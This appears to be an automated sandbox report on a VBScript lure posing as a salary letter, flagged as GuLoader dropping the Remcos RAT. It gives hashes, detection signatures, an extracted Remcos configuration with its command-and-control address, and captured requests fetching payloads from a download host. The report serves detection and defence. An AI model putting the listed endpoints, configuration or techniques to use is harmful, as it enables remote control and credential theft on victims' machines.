Windows Analysis Report
Salary Increase Letter_Oct 2024.vbs

Overview

General Information

Sample name: Salary Increase Letter_Oct 2024.vbs
Analysis ID: 1530593
MD5: 35c0401fa3a0988df57e978eaa661dd2
SHA1: a07a742be842b55f4218d8c9f6f2287c21baf2db
SHA256: 165cb6e17955b9dbc743f800788545b61e296119b10d22efea0cfb2f1ceb4ed5
Tags: vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

AV Detection

barindex
Source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "154.216.17.14:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KC5V8F", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: Salary Increase Letter_Oct 2024.vbs Virustotal: Detection: 7% Perma Link
Source: Yara match File source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.6% probability
Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\<.oeaccountC#z source: msiexec.exe, 0000000D.00000002.2629663448.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627803746.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2627748759.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbq source: powershell.exe, 00000004.00000002.2497990268.0000000006D26000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: msiexec.exe, 0000000D.00000002.2629463752.0000000002A4A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_223210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_223210F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22326580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA, 7_2_22326580
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW, 10_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49915 -> 154.216.17.14:2404
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49926 -> 154.216.17.14:2404
Source: Malware configuration extractor URLs: 154.216.17.14
Source: global traffic TCP traffic: 192.168.2.6:49915 -> 154.216.17.14:2404
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49893 -> 104.21.2.6:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49927 -> 178.237.33.50:80
Source: global traffic HTTP traffic detected: GET /IBodHWPw/Kokkerering.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ln6b9.shopConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /NrFLrAda/NwiqNYffVolUqcmi160.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ln6b9.shopCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.14
Source: global traffic HTTP traffic detected: GET /IBodHWPw/Kokkerering.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ln6b9.shopConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /NrFLrAda/NwiqNYffVolUqcmi160.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ln6b9.shopCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: msiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000A.00000002.2643859057.0000000004889000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000A.00000002.2643859057.0000000004889000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: msiexec.exe, 00000007.00000002.3473023585.0000000022760000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000007.00000002.3473023585.0000000022760000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: ln6b9.shop
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: bhvF097.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvF097.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhvF097.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp1
Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpI
Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpf
Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gphy
Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpl
Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpxes
Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpy2
Source: powershell.exe, 00000002.00000002.2303486839.000001ACE71F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2303486839.000001ACE57D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2303486839.000001ACE6B15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop
Source: powershell.exe, 00000002.00000002.2303486839.000001ACE57D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/IBodHWPw/Kokkerering.ocxP
Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/IBodHWPw/Kokkerering.ocxXR
Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin
Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin0JdY
Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.binK
Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bins
Source: powershell.exe, 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvF097.tmp.10.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhvF097.tmp.10.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhvF097.tmp.10.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhvF097.tmp.10.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhvF097.tmp.10.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2303486839.000001ACE55B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2467560447.0000000004381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhvF097.tmp.10.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhvF097.tmp.10.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617219052.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617410660.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2619527438.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617386032.00000000034ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 0000000E.00000003.2617219052.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617410660.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2619527438.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617386032.00000000034ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.compData
Source: msiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe, 0000000A.00000002.2643350268.00000000029C4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhvF097.tmp.10.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
Source: bhvF097.tmp.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvF097.tmp.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhvF097.tmp.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhvF097.tmp.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvF097.tmp.10.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.2303486839.000001ACE55B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2467560447.0000000004381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhvF097.tmp.10.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhvF097.tmp.10.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: bhvF097.tmp.10.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhvF097.tmp.10.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhvF097.tmp.10.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvF097.tmp.10.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: bhvF097.tmp.10.dr String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
Source: bhvF097.tmp.10.dr String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
Source: bhvF097.tmp.10.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
Source: bhvF097.tmp.10.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
Source: bhvF097.tmp.10.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
Source: bhvF097.tmp.10.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
Source: bhvF097.tmp.10.dr String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhvF097.tmp.10.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2303486839.000001ACE6115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhvF097.tmp.10.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvF097.tmp.10.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhvF097.tmp.10.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: msiexec.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvF097.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhvF097.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhvF097.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
